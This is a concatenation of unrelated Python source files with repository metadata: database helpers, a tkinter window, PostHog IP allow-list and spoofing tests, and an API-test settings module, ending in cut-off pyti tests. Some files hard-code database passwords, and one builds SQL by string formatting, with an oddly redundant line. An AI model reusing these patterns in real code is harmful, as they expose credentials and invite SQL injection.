CopyDataFiles(options.OUTPUTDir,folderName,PIMCs,fileList)
#-------------------------- Move data-files----------------------------
if (options.move):
MoveDataFiles(options.OUTPUTDir,folderName,PIMCs,fileList)
#-------------------------- Delete data-files--------------------------
if (options.delete):
DeleteDataFiles(options.OUTPUTDir,PIMCs,fileList)
#---------------------------------------------------------------------------------------------#
#--------------------------------------Cylindrical output-------------------------------------#
#---------------------------------------------------------------------------------------------#
if os.path.exists(options.OUTPUTDir+'CYLINDER'):
cfileList = os.listdir(options.OUTPUTDir+'CYLINDER')
else:
print 'No cylindrical ouput'
sys.exit()
for n,fileName in enumerate(cfileList):
cfileList[n] = 'CYLINDER/' + fileName
#-------------------------- archive data-files-----------------------
if (options.archive):
#Create an archive folder
if not(os.path.exists(options.OUTPUTDir+'archive/CYLINDER')):
os.makedirs(options.OUTPUTDir+'archive/CYLINDER')
for pimcid in PIMCs:
for fileName in cfileList:
if fileName.find(pimcid) != -1:
shutil.copyfile(options.OUTPUTDir+fileName, options.OUTPUTDir+'archive/'+fileName)
if options.copy or options.move:
os.makedirs(folderName+'CYLINDER/')
#-------------------------- Copy data-files----------------------------
if (options.copy):
CopyDataFiles(options.OUTPUTDir,folderName,PIMCs,cfileList)
#-------------------------- Move data-files----------------------------
if (options.move):
MoveDataFiles(options.OUTPUTDir, folderName,PIMCs,cfileList)
#-------------------------- Delete data-files--------------------------
if (options.delete):
DeleteDataFiles(options.OUTPUTDir, PIMCs,cfileList)
if __name__ == "__main__":
    # Script entry point: run the archive/copy/move/delete workflow above.
    main()
| [
"bohdan.kul@gmail.com"
] | bohdan.kul@gmail.com |
ca7d63f3b658a434c6153999f2adede751fedc6d | e3b8d982a3c1060e86f3dc82ca07b258cfa19b46 | /connection/conn.py | 040f3af10d81cb78e1a8839ed2f1e55ca5ffcacf | [] | no_license | paul30041981/BIBLIOTECA | b79316ef4eef869d7eeb8214cc580bd35c2ec7f9 | 8b4fc117ce51d3ebf0c6f56c7e4a9a83576faccd | refs/heads/main | 2023-02-28T20:54:36.880403 | 2021-02-01T17:23:21 | 2021-02-01T17:23:21 | 335,025,010 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,155 | py | from psycopg2 import connect
class Connection:
    """Thin CRUD helper bound to a single database table.

    All value substitution now goes through DB-API ``%s`` placeholders
    (supported by both psycopg2 and pymysql), so user-supplied *values*
    can no longer inject SQL and strings containing quotes no longer
    break the statement (the original interpolated quoted ``str()``
    values directly into the query text).  Table and column *names* are
    still interpolated and must come from trusted calling code.
    """

    def __init__(self, table_name):
        self.table_name = table_name
        # NOTE(review): credentials are hard-coded here; they should be
        # moved to configuration/environment before production use.
        self.db = connect(host='127.0.0.1',
                          user='postgres',
                          password='admin',
                          database='biblioteca')
        self.cursor = self.db.cursor()

    @staticmethod
    def _where(id_object):
        """Build a parameterized WHERE clause from a {column: value} dict.

        Returns ``(clause, params)``, e.g. ``("a=%s AND b=%s", (1, 'x'))``.
        """
        clause = " AND ".join("{}=%s".format(name) for name in id_object)
        return clause, tuple(id_object.values())

    def execute_query(self, query, params=None):
        """Run a DML statement (INSERT/UPDATE/DELETE) and commit it.

        *params* is an optional tuple of values for ``%s`` placeholders;
        omitting it keeps the original raw-query call style working.
        """
        self.cursor.execute(query, params)
        self.commit()

    def get_all(self, order):
        """Return every row of the table, ordered by the *order* column."""
        query = f'SELECT * FROM {self.table_name} ORDER BY {order}'
        self.cursor.execute(query)
        return self.cursor.fetchall()

    def get_by_id(self, id_object):
        """Return the first row matching every column=value pair, or None."""
        clause, params = self._where(id_object)
        query = f'SELECT * FROM {self.table_name} WHERE {clause}'
        self.cursor.execute(query, params)
        return self.cursor.fetchone()

    def get_columns(self, id_object):
        """Return all rows matching the column=value pairs in *id_object*."""
        clause, params = self._where(id_object)
        query = f'SELECT * FROM {self.table_name} WHERE {clause}'
        self.cursor.execute(query, params)
        return self.cursor.fetchall()

    def insert(self, data):
        """Insert one row; *data* maps column names to values."""
        placeholders = ", ".join(["%s"] * len(data))
        query = f'INSERT INTO {self.table_name} ({", ".join(data.keys())}) VALUES ({placeholders})'
        self.execute_query(query, tuple(data.values()))
        return True

    def update(self, id_object, data):
        """Update rows matching *id_object* with the values in *data*."""
        assignments = ", ".join("{}=%s".format(name) for name in data)
        clause, where_params = self._where(id_object)
        query = f'UPDATE {self.table_name} SET {assignments} WHERE {clause}'
        self.execute_query(query, tuple(data.values()) + where_params)
        return True

    def delete(self, id_object):
        """Delete rows matching the column=value pairs in *id_object*."""
        clause, params = self._where(id_object)
        query = f'DELETE FROM {self.table_name} WHERE {clause}'
        self.execute_query(query, params)
        return True

    def commit(self):
        """Commit the current transaction on the underlying connection."""
        self.db.commit()
        return True
| [
"paul.cruces@celeritech.biz"
] | paul.cruces@celeritech.biz |
3b46437bab2201c5b68d21fe24459ba22d1c1b65 | 70cc4af81e3085de43faa47aff8722562d2645c7 | /failure.py | 687aaff345e489c7f40ca74633f1c7673ec840dd | [] | no_license | jl24350/food-log | 4b57201c1d2c83eaee8163e074880fb449f2c9b3 | e7c2f1789b709f33b20da8acbc99c5288b2e2680 | refs/heads/main | 2023-03-22T07:25:47.676032 | 2021-03-12T23:24:34 | 2021-03-12T23:24:34 | 347,223,686 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 571 | py | import tkinter as tk
import time
import subprocess
def main_menu():
    """Close this error window and re-launch the main menu script."""
    # `window` is the module-level Tk root created below this function.
    window.destroy()
    # NOTE(review): shell=True with a fixed "main.py" string relies on the
    # OS file association to pick a Python interpreter -- presumably this
    # was developed on Windows; confirm it launches on other platforms.
    subprocess.call("main.py", shell=True)
# Build the "something went wrong" window: a title label and a single
# button that returns the user to the main menu.
window = tk.Tk()
window.rowconfigure(0, minsize=250, weight=1)
window.columnconfigure([0, 1, 2], minsize=250, weight=1)
title = tk.Label(master=window, text= "Something Went Wrong! Try Again",font=('Arial',30))
title.grid(row=0, column = 1)
btn_enter =tk.Button(master=window, text="Return to Main Menu", command=main_menu, width = 25,font=('Arial',12))
btn_enter.grid(row=2,column=1,pady=10)
# Blocks until the window is destroyed (by main_menu or the user).
window.mainloop()
| [
"noreply@github.com"
] | jl24350.noreply@github.com |
1908f8673019ee60a62183f9409a6ca86cd08649 | 358519772669c73092f625f630722c38e1d33783 | /ctools/Testing/Types/ImproperDihedral2Type.py | 3855f86040c5114b8995f4d188699f85bb2a3205 | [] | no_license | minghao2016/mmtools | e7e61aca084498408ceae965dd6c9450ad89eafa | 3ade988afb51cd54ee5a4067d8deaad88afbb0fe | refs/heads/master | 2021-09-21T01:02:22.522187 | 2014-09-19T03:40:03 | 2014-09-19T03:40:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 557 | py | import sys
sys.path.append('..')
from Decorators import *
from Types.AbstractDihedralType import *
class ImproperDihedral2Type(AbstractDihedralType):
@accepts_compatible_units(None,
None,
None,
None,
None,
units.degrees,
units.kilojoules_per_mole * units.radians**(-2))
def __init__(self, atom1, atom2, atom3, atom4, type, xi, k):
"""
"""
AbstractDihedralType.__init__(self, atom1, atom2, atom3, atom4, type)
self.xi = xi
self.k = k
| [
"choderaj@mskcc.org"
] | choderaj@mskcc.org |
56e9f9a74c861671e55dd10179ddabf593b5357f | d3bcffd405b98c8281fca1fcd49e48cbda3480ec | /python-interm-class files/EXAMPLES/use_samplelib1.py | 5f30c34c287a032469ad824bef8ee16c0234132b | [] | no_license | tbro28/intermediatepython | cfef5232f1a3db37f37f3bdd5c49232d8d815839 | 5c665c10ff6aac00e8e6620b165fc97c7e2da525 | refs/heads/main | 2023-01-06T19:25:09.778419 | 2020-11-11T21:56:54 | 2020-11-11T21:56:54 | 312,094,799 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 88 | py | #!/usr/bin/env python
import samplelib # <1>
samplelib.spam() # <2>
samplelib.ham()
| [
"brownti28@yahoo.com"
] | brownti28@yahoo.com |
fde4b6b5dc43b86ba4ef792ff3fedc412c970a03 | 4d5c707b45fe7f8f9baa80a291fe9d9c2ee357c1 | /dataqs/airnow/tasks.py | 9a75315181b1e007a03bc6532020c5869eef6375 | [
"Apache-2.0"
] | permissive | dorukozturk/dataqs | 96772c2e5a262b4753dcf03e043d81b9c5491eb4 | 9b938f3c2f2b15b75c149f8dd06083f2d888f77d | refs/heads/master | 2021-01-12T01:56:51.017629 | 2017-01-10T18:32:02 | 2017-01-10T18:32:02 | 54,613,378 | 1 | 0 | null | 2016-03-24T03:58:38 | 2016-03-24T03:58:38 | null | UTF-8 | Python | false | false | 1,050 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# Copyright Kitware Inc. and Epidemico Inc.
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
from __future__ import absolute_import
from celery import shared_task
from dataqs.airnow.airnow import AirNowGRIB2HourlyProcessor
@shared_task
def airnow_grib_hourly_task():
processor = AirNowGRIB2HourlyProcessor()
processor.run()
| [
"matt@epidemico.com"
] | matt@epidemico.com |
76685f23ac80025d9fc64fa03036df7c4bbdbbbe | 485816a0a8b86818e4f2cefec517e6316e2252d6 | /posthog/test/test_middleware.py | e7bd0e8275c8ba6c3d46790e80193e5a60a215f4 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | abhijitghate/posthog | 3647443274aee6431e7fecf6902644a9fa7eb9d8 | 68dc4d2730600efb00d3708fb7fba70d85612760 | refs/heads/master | 2023-04-19T15:17:25.033992 | 2021-05-13T09:48:59 | 2021-05-13T09:48:59 | 279,130,099 | 1 | 0 | MIT | 2020-07-12T19:04:15 | 2020-07-12T19:04:14 | null | UTF-8 | Python | false | false | 6,775 | py | from django.conf import settings
from rest_framework import status
from posthog.test.base import APIBaseTest
class TestAccessMiddleware(APIBaseTest):
CONFIG_AUTO_LOGIN = False
def test_ip_range(self):
"""
Also test that capture endpoint is not restrictied by ALLOWED_IP_BLOCKS
"""
with self.settings(ALLOWED_IP_BLOCKS=["192.168.0.0/31", "127.0.0.0/25", "128.0.0.1"]):
# not in list
response = self.client.get("/", REMOTE_ADDR="10.0.0.1")
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertIn(b"IP is not allowed", response.content)
response = self.client.get("/batch/", REMOTE_ADDR="10.0.0.1",)
self.assertEqual(
response.status_code, status.HTTP_400_BAD_REQUEST
) # Check for a bad request exception because it means the middleware didn't block the request
# /31 block
response = self.client.get("/", REMOTE_ADDR="192.168.0.1")
self.assertNotEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertNotIn(b"IP is not allowed", response.content)
response = self.client.get("/", REMOTE_ADDR="192.168.0.2")
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertIn(b"IP is not allowed", response.content)
response = self.client.get("/batch/", REMOTE_ADDR="192.168.0.1")
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
response = self.client.get("/batch/", REMOTE_ADDR="192.168.0.2")
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
# /24 block
response = self.client.get("/", REMOTE_ADDR="127.0.0.1")
self.assertNotEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertNotIn(b"IP is not allowed", response.content)
response = self.client.get("/", REMOTE_ADDR="127.0.0.100")
self.assertNotEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertNotIn(b"IP is not allowed", response.content)
response = self.client.get("/", REMOTE_ADDR="127.0.0.200")
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertIn(b"IP is not allowed", response.content)
# precise ip
response = self.client.get("/", REMOTE_ADDR="128.0.0.1")
self.assertNotEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertNotIn(b"IP is not allowed", response.content)
response = self.client.get("/", REMOTE_ADDR="128.0.0.2")
self.assertIn(b"IP is not allowed", response.content)
def test_trusted_proxies(self):
with self.settings(
ALLOWED_IP_BLOCKS=["192.168.0.0/31", "127.0.0.0/25,128.0.0.1"], USE_X_FORWARDED_HOST=True,
):
with self.settings(TRUSTED_PROXIES="10.0.0.1"):
response = self.client.get("/", REMOTE_ADDR="10.0.0.1", HTTP_X_FORWARDED_FOR="192.168.0.1,10.0.0.1",)
self.assertNotIn(b"IP is not allowed", response.content)
def test_attempt_spoofing(self):
with self.settings(
ALLOWED_IP_BLOCKS=["192.168.0.0/31", "127.0.0.0/25,128.0.0.1"], USE_X_FORWARDED_HOST=True,
):
with self.settings(TRUSTED_PROXIES="10.0.0.1"):
response = self.client.get("/", REMOTE_ADDR="10.0.0.1", HTTP_X_FORWARDED_FOR="192.168.0.1,10.0.0.2",)
self.assertIn(b"IP is not allowed", response.content)
def test_trust_all_proxies(self):
with self.settings(
ALLOWED_IP_BLOCKS=["192.168.0.0/31", "127.0.0.0/25,128.0.0.1"], USE_X_FORWARDED_HOST=True,
):
with self.settings(TRUST_ALL_PROXIES=True):
response = self.client.get("/", REMOTE_ADDR="10.0.0.1", HTTP_X_FORWARDED_FOR="192.168.0.1,10.0.0.1",)
self.assertNotIn(b"IP is not allowed", response.content)
class TestToolbarCookieMiddleware(APIBaseTest):
CONFIG_AUTO_LOGIN = False
def test_logged_out_client(self):
response = self.client.get("/")
self.assertEqual(0, len(response.cookies))
def test_logged_in_client(self):
with self.settings(TOOLBAR_COOKIE_NAME="phtoolbar", TOOLBAR_COOKIE_SECURE=False):
self.client.force_login(self.user)
response = self.client.get("/")
toolbar_cookie = response.cookies[settings.TOOLBAR_COOKIE_NAME]
self.assertEqual(toolbar_cookie.key, settings.TOOLBAR_COOKIE_NAME)
self.assertEqual(toolbar_cookie.value, "yes")
self.assertEqual(toolbar_cookie["path"], "/")
self.assertEqual(toolbar_cookie["samesite"], "None")
self.assertEqual(toolbar_cookie["httponly"], True)
self.assertEqual(toolbar_cookie["domain"], "")
self.assertEqual(toolbar_cookie["comment"], "")
self.assertEqual(toolbar_cookie["secure"], "")
self.assertEqual(toolbar_cookie["max-age"], 31536000)
def test_logged_in_client_secure(self):
with self.settings(TOOLBAR_COOKIE_NAME="phtoolbar", TOOLBAR_COOKIE_SECURE=True):
self.client.force_login(self.user)
response = self.client.get("/")
toolbar_cookie = response.cookies[settings.TOOLBAR_COOKIE_NAME]
self.assertEqual(toolbar_cookie.key, "phtoolbar")
self.assertEqual(toolbar_cookie.value, "yes")
self.assertEqual(toolbar_cookie["path"], "/")
self.assertEqual(toolbar_cookie["samesite"], "None")
self.assertEqual(toolbar_cookie["httponly"], True)
self.assertEqual(toolbar_cookie["domain"], "")
self.assertEqual(toolbar_cookie["comment"], "")
self.assertEqual(toolbar_cookie["secure"], True)
self.assertEqual(toolbar_cookie["max-age"], 31536000)
def test_logout(self):
with self.settings(TOOLBAR_COOKIE_NAME="phtoolbar"):
self.client.force_login(self.user)
response = self.client.get("/")
self.assertEqual(response.cookies[settings.TOOLBAR_COOKIE_NAME].key, "phtoolbar")
self.assertEqual(response.cookies[settings.TOOLBAR_COOKIE_NAME].value, "yes")
self.assertEqual(response.cookies[settings.TOOLBAR_COOKIE_NAME]["max-age"], 31536000)
response = self.client.get("/logout")
self.assertEqual(response.cookies[settings.TOOLBAR_COOKIE_NAME].key, "phtoolbar")
self.assertEqual(response.cookies[settings.TOOLBAR_COOKIE_NAME].value, "")
self.assertEqual(response.cookies[settings.TOOLBAR_COOKIE_NAME]["max-age"], 0)
| [
"noreply@github.com"
] | abhijitghate.noreply@github.com |
5da2bb73cee504a5ec4a593142d03a0d73ca261a | 666ec5948ab7f0b8c5df507e5ca702f2f126deac | /venv/bin/pip3 | ae3763ac677e8a4866fc454774c2b42f41e26ecd | [] | no_license | mforner13/microblog | 56ab51f515ed80fa271ba3a6d15fc632cba7f512 | e1de13c5d6bf2b07e00ec5149d37a89677ea3a7e | refs/heads/master | 2020-06-01T04:18:52.399698 | 2019-08-08T21:24:47 | 2019-08-08T21:24:47 | 190,631,063 | 1 | 2 | null | 2019-06-06T21:08:59 | 2019-06-06T18:33:26 | Python | UTF-8 | Python | false | false | 255 | #!/Users/miriamforner/Documents/microblog/venv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal import main
if __name__ == '__main__':
    # Auto-generated console-script shim (created by pip inside the venv):
    # normalize argv[0] by stripping any "-script.pyw"/".exe" wrapper suffix,
    # then delegate to pip's internal entry point and propagate its exit code.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
| [
"miriamforner@Mo-Macbook-Pro-with-the-touchbar-and-bluetooth-mouse.local"
] | miriamforner@Mo-Macbook-Pro-with-the-touchbar-and-bluetooth-mouse.local | |
a8c4d405d671905f725216d0b46f0e6706a0ca3b | cb0b486eafb14d99861120fef9231c421238680e | /config/settings.py | ca234b4f31c74c3255e4150532d69635dde93ff9 | [] | no_license | webclinic017/apitest | f617b9d7c3564e4f99230b67716536399f3e0074 | 9b7f939f2d990dcccad69423ba0f9f0762409f56 | refs/heads/master | 2023-05-08T20:45:52.403365 | 2020-07-09T05:52:44 | 2020-07-09T05:52:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,388 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Project root path (two directory levels above this settings file).
import os
BASE_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
#print(BASE_PATH)
# Directory holding the executable test cases.
TESTCASE_PATH = os.path.join(BASE_PATH,'test_case')
# Excel workbook with the test data.
TESTCASE_EXCLE_PATH = os.path.join(BASE_PATH,'config','test.xlsx')
print(TESTCASE_EXCLE_PATH)
#print(TESTCASE_PATH)
# Directory where test reports are written.
REPORT_PATH = os.path.join(BASE_PATH,'report')
#print(REPORT_PATH)
# Path of the log file.
LOG_PATH = os.path.join(BASE_PATH,'log/log.txt')
# MySQL connection settings.
# NOTE(review): credentials are hard-coded and committed; move them to
# environment variables or an ignored config file.
USER_NAME = 'parcels_test'
USER_PASSWORD = '123456'
DB_IP = '192.168.8.168'
DB_NAME = 'parcels_17feia_merge3'
port = 3306
import pymysql
from common.logger import Logger
logger = Logger().logger
def assertEquals(actual, expected):
    '''
    Assert that two values are equal, logging the outcome.

    :param actual: the value produced by the code under test
    :param expected: the value the test expects
    :return: None
    :raises AssertionError: if ``actual != expected``
    '''
    try:
        assert actual == expected
        logger.info('断言成功,实际值:{} 等于预期值:{}'.format(actual, expected))
    except AssertionError:
        # Log the mismatch at ERROR level -- a failed assertion is a test
        # failure, not routine progress information (was logger.info).
        logger.error('断言失败,实际值:{} 不等于预期值:{}'.format(actual, expected))
        # Bare raise keeps the original exception and traceback intact.
        raise
def opera_db(order_on):
    """Query the finance tables for one order and assert it is paid.

    Joins order item -> finance order -> finance package for the given
    internal order number and checks the item's ``is_payed`` flag.

    :param order_on: internal order number (``orde_order_inside_no``)
    """
    # Expected value of the is_payed flag (1 == paid).
    expect = 1
    db = pymysql.connect(host=DB_IP, port=3306, user=USER_NAME, passwd=USER_PASSWORD, db=DB_NAME, charset='utf8')
    try:
        with db.cursor() as cursor:
            # NOTE(review): order_on is interpolated via str.format -- SQL
            # injection risk if it can come from untrusted input; prefer a
            # parameterized query (cursor.execute(sql, (order_on,))).
            sql = "SELECT i.orde_order_inside_no,i.is_payed,o.finace_order_no,o.is_payed,p.finance_order_package_no,p.is_payed FROM fina_finance_order_item i LEFT JOIN fina_finance_order o ON i.finance_order_id = o.id LEFT JOIN fina_finance_order_package p ON p.id = o.finance_order_package_id WHERE i.orde_order_inside_no = '{}'".format(sql_order := order_on) if False else "SELECT i.orde_order_inside_no,i.is_payed,o.finace_order_no,o.is_payed,p.finance_order_package_no,p.is_payed FROM fina_finance_order_item i LEFT JOIN fina_finance_order o ON i.finance_order_id = o.id LEFT JOIN fina_finance_order_package p ON p.id = o.finance_order_package_id WHERE i.orde_order_inside_no = '{}'".format(order_on)
            cursor.execute(sql)
            results = cursor.fetchall()
            print(results)
            for result in results:
                print(result)
                # Collect the three is_payed flags (item, order, package).
                # NOTE(review): result[n][0] takes the first character of the
                # column value before int() -- presumably the flags are
                # strings like '1'; confirm against the column type.
                resultStaus =[]
                resultStaus.append(int(result[1][0]))
                resultStaus.append(int(result[3][0]))
                resultStaus.append(int(result[5][0]))
                print(resultStaus)
                # Only the item-level flag is asserted here.
                assertEquals(resultStaus[0],expect)
    except AssertionError as e:
        print("no search data:{}".format(e))
    finally:
        db.close()

if __name__ == "__main__":
    # Ad-hoc manual run against a known order number.
    opera_db("FEISZ1720315782YQ")
| [
"1161313037@qq.com"
] | 1161313037@qq.com |
8d4456f1709a03ff7ff76e4b6638771ded6bae27 | 4c6113392ea456e1eb964172b43f0c9846ca712a | /tests/test_standard_deviation.py | 6b866dc49e5a5dc366f0596b18e6b8812eb37b4d | [
"MIT"
] | permissive | g8a9/pyti | abd344d4d5eb30f36e6c860eb82567d7cacbd780 | 1697ea000730a2238df70505ba77e165619fdf8c | refs/heads/master | 2020-03-27T11:04:22.417031 | 2019-09-09T08:50:51 | 2019-09-09T08:50:51 | 146,463,237 | 0 | 1 | MIT | 2018-08-28T14:53:08 | 2018-08-28T14:53:07 | null | UTF-8 | Python | false | false | 9,669 | py | from __future__ import absolute_import
import unittest
import numpy as np
from tests.sample_data import SampleData
from pyti import standard_deviation
class TestStandardDeviation(unittest.TestCase):
    """Regression tests for pyti.standard_deviation against fixed fixtures."""

    def setUp(self):
        """Create data to use for testing."""
        self.data = SampleData().get_sample_close_data()

        # Pre-computed expected rolling standard deviations for the sample
        # close data; the first (period - 1) entries are NaN because a full
        # window is not yet available.
        self.std_period_6_expected = [np.nan, np.nan, np.nan, np.nan, np.nan,
            6.5577905323871235, 3.523047922845588, 3.64000366300183,
            2.6142411263437193, 2.6233540871691017, 2.5428206123646837,
            2.8984064587286413, 2.8167262321117761, 3.8064874447010402,
            4.1082230546389029, 8.3307254586060449, 10.698429168184775,
            14.471698472075328, 14.149189022696682, 16.029104466563318,
            13.032673938988863, 10.08650583700817, 9.4405432400189078,
            10.488392949669004, 10.589531938035151, 8.7339880161737451,
            5.0316216736422801, 3.8436670858265902, 3.9887023788027181,
            4.0649809347646144, 4.083843369507024, 4.8440000688136395,
            11.967095581914025, 11.182192390880525, 11.491860887892189,
            16.916712151006177, 22.056151447309816, 22.859576257373337,
            16.434078820142823, 14.253613810773276, 13.039983767883554,
            13.022551209344496, 12.50387726533919, 16.058846471649176,
            15.333279710051146, 12.463120663247507, 8.355378307812666,
            9.0049564129983466, 6.6962407364132304, 6.4353546910795751,
            5.2716958055891929, 5.3789689222625849, 9.4365405031010461,
            9.4650967594983619, 10.229352700277104, 9.58579104716976,
            6.4664696705389293, 4.0370422341114756, 5.161696103672357,
            5.3648150014701983, 5.8074081998770941, 5.3992755686912774,
            5.2324474834121784, 1.4768265526684596, 1.3318358257182561,
            3.448881944437431, 4.2672145481566792, 4.2827919242786781,
            5.130538633191148, 5.783125164361131, 5.2763611198123055,
            6.6918926072275768, 8.2688781988046696, 8.8089197218879818,
            7.3125547291399391, 5.0221549159698196, 5.0711711336402896,
            4.9256529178035535, 5.6864083567749528, 6.5936466895540216,
            8.2274234524951151, 8.8677071444652373, 7.4646598493612917,
            8.3602240799315091, 8.0184206674381961, 8.3401744586069686,
            6.6355034976003617, 2.6993406602353964, 2.0581391271405236,
            2.0719885778321165, 2.0978504872051325, 2.2254437759692176,
            3.049114078985355, 4.1007641564306905, 4.3524338019089699,
            3.4153872401237066, 3.4531299811426996, 2.9287608301122723,
            2.648205052483652, 2.6683584217017398, 2.7031296676260124,
            1.2711792425408255, 1.158740695755534, 4.2491112796285666,
            4.7691131250998939, 4.4221567136409838, 3.7499159990591719,
            5.0847300813317311, 13.454516589854368, 17.889961896736011,
            19.98118781921303, 18.782584131760668, 12.993947821966982,
            3.989429783816254, 2.5093963417523479, 2.2056057369046482,
            2.4943830232477606, 8.4362062958812629, 9.8113133677403432,
            11.767257964368774, 10.560069602043356, 9.2450563365869662,
            6.762383209096229, 10.628135772561432, 10.820357973129482,
            11.395558345250143, 8.3253558482505863]

        self.std_period_8_expected = [np.nan, np.nan, np.nan, np.nan, np.nan,
            np.nan, np.nan, 7.0210000050867709, 4.1373628591859681,
            3.2119864792457009, 2.7914512354687684, 3.4517159293810558,
            2.9480489916456389, 3.3239821213203209, 3.5875118217824093,
            7.0898191594910145, 9.6610417029280189, 14.687200878413067,
            16.195911080093211, 18.167517274756381, 17.864408150605726,
            15.684568394262103, 11.769444625202757, 10.355555358633076,
            8.9695687903998031, 8.9965326654217108, 9.4195188685136966,
            7.8538143599145407, 4.9657714118035772, 4.4569047555450325,
            3.8001832662573869, 4.1709606207683017, 10.62482193128093,
            10.778041168439238, 10.368574688520509, 14.639153956818289,
            18.713909981233599, 19.898422047991648, 19.861963649146077,
            19.509732690194838, 14.34043079398743, 12.959500651755734,
            12.497358506614786, 14.475216998126715, 15.211531281517024,
            17.001755161495186, 16.432812069149929, 14.674135408943185,
            9.7164201961715975, 7.6440704143800264, 5.8451933855335998,
            5.64821447766586, 8.2422530726910797, 10.625605192848331,
            11.692462086440853, 9.3994635105262265, 8.8257479448324467,
            8.2020719290049708, 6.6277963101298756, 4.6265561088752829,
            5.0357789509525652, 5.1546871874052478, 5.4984069121363168,
            4.875291749511721, 4.4419035494770691, 3.0770089256567457,
            3.888717884562241, 3.9120171997869004, 5.1726366238947525,
            6.0172975365073498, 5.404976542832701, 6.0530629790686739,
            7.3309684363176757, 7.7985836626183254, 7.575020980640458,
            9.0041798825402761, 8.6284213710934914, 5.4515083102883279,
            5.1782069083529505, 5.6630795193831744, 7.1805271145548293,
            8.1723628337044669, 8.0955966867356697, 7.9802591257606208,
            7.8027393312495414, 8.0798487211793066, 7.3342765491901138,
            7.2319093260355505, 5.8455966333642975, 2.3867655938529189,
            2.3230690906643527, 2.6017847583094862, 2.8489970039597292,
            3.6898432022435403, 4.8986382947567213, 4.7263741388087315,
            4.3969662837006034, 4.042064536135654, 3.9273398394187429,
            3.2888054170821017, 2.6214268197736392, 2.3381906924555294,
            2.3338621424582748, 3.6274033904630554, 4.3679741544892181,
            4.5729569989543766, 4.3530613201680106, 5.4448558619253422,
            13.02311290140943, 16.948090442373044, 18.927592811629722,
            20.199922736768791, 19.547403736996472, 17.506905933292263,
            11.913134333283477, 4.0137655992489707, 3.0322316157293447,
            7.5580302611574259, 9.5411865651725272, 11.636474598065714,
            11.543465684100253, 12.016773321962457, 12.317852244956159,
            13.544956625991842, 11.53342773667667, 12.324006697151235,
            11.031367937451309]

        self.std_period_10_expected = [np.nan, np.nan, np.nan, np.nan, np.nan,
            np.nan, np.nan, np.nan, np.nan, 6.4860058759009869, 4.1526223307955945,
            3.9927105802672158, 3.3004546824810688, 3.5370766334801407,
            3.3311401118002317, 6.4384024933726254, 8.9119850014834938,
            13.351934067142995, 15.482619969214232, 19.070120928358637,
            20.404015100519359, 18.748148353015203, 16.133700409047169,
            14.06749796121858, 10.572570590395159, 9.1555945859470089,
            8.3281877447083907, 8.5784715033234864, 8.6222052476923263,
            7.3341742699653665, 4.63688305270301, 4.7504993889531688,
            9.7508812137387935, 9.598666805574835, 9.6019130616999515,
            13.188306942136279, 16.671782548166032, 17.789894790770031,
            17.598722302106669, 17.607555480531644, 17.578184743849089,
            18.26081734205783, 14.630932263150182, 14.408303315950986,
            13.91782390398089, 15.258254924247829, 17.018062822255114,
            19.390673273509599, 17.141471640439732, 13.282047574744562,
            8.829194250389504, 6.9174080727136875, 7.5843822717769385,
            9.459425928082986, 10.848561399763753, 11.075405435267605,
            10.800855984596765, 8.4768862207770468, 8.7709599753327296,
            8.5115699035032346, 6.5623254685786003, 4.577379648275234,
            4.8737227386601729, 4.8845566158386609, 4.9416124224116613,
            4.7068613038131062, 4.847774403441905, 3.641202640154293,
            4.865707211358564, 5.8317850326179617, 5.5646648097117852,
            5.8853513064217546, 6.6371132446435244, 7.1101839326107275,
            7.1871184922903826, 8.3465498527502113, 9.073611555861687,
            9.0870854024330132, 8.3398348638060895, 5.9142930450073328,
            6.4203717441697474, 7.2659339080090346, 7.2219849533674978,
            7.5313847774938836, 7.758637122587956, 7.6485459039247745,
            7.1610294883720007, 7.2388940990856998, 6.9341618895949626,
            6.6686421239842977, 5.2047658715621195, 2.6397003196912121,
            3.1091942507487307, 3.9894729532163118, 4.6656708461318193,
            4.5243402220041311, 5.1604522842264302, 5.3878571291789461,
            4.974325638270523, 4.4714657055103819, 3.9744830551350327,
            3.0170508042715429, 2.3489572154468794, 3.5151007572092858,
            4.0541939875749557, 4.1687462810245028, 4.2825289776537945,
            5.7083739657921253, 12.580634324230228, 16.397131049871689,
            19.065494398694895, 20.371646308861077, 19.941000225665718,
            20.204460151164653, 18.947481949383747, 16.459877952834979,
            11.294674261202355, 8.0265482410975864, 9.2898478040397627,
            11.14332904576645, 11.873670966563889, 12.684673166200744,
            13.797316164143426, 16.063193435096697, 15.897444378823213,
            15.397173477983268, 12.449335591374611]

    def test_standard_deviation_period_6(self):
        """Period-6 rolling std matches the recorded fixture exactly."""
        period = 6
        std = standard_deviation.standard_deviation(self.data, period)
        np.testing.assert_array_equal(std, self.std_period_6_expected)

    def test_standard_deviation_period_8(self):
        """Period-8 rolling std matches the recorded fixture exactly."""
        period = 8
        std = standard_deviation.standard_deviation(self.data, period)
        np.testing.assert_array_equal(std, self.std_period_8_expected)

    def test_standard_deviation_period_10(self):
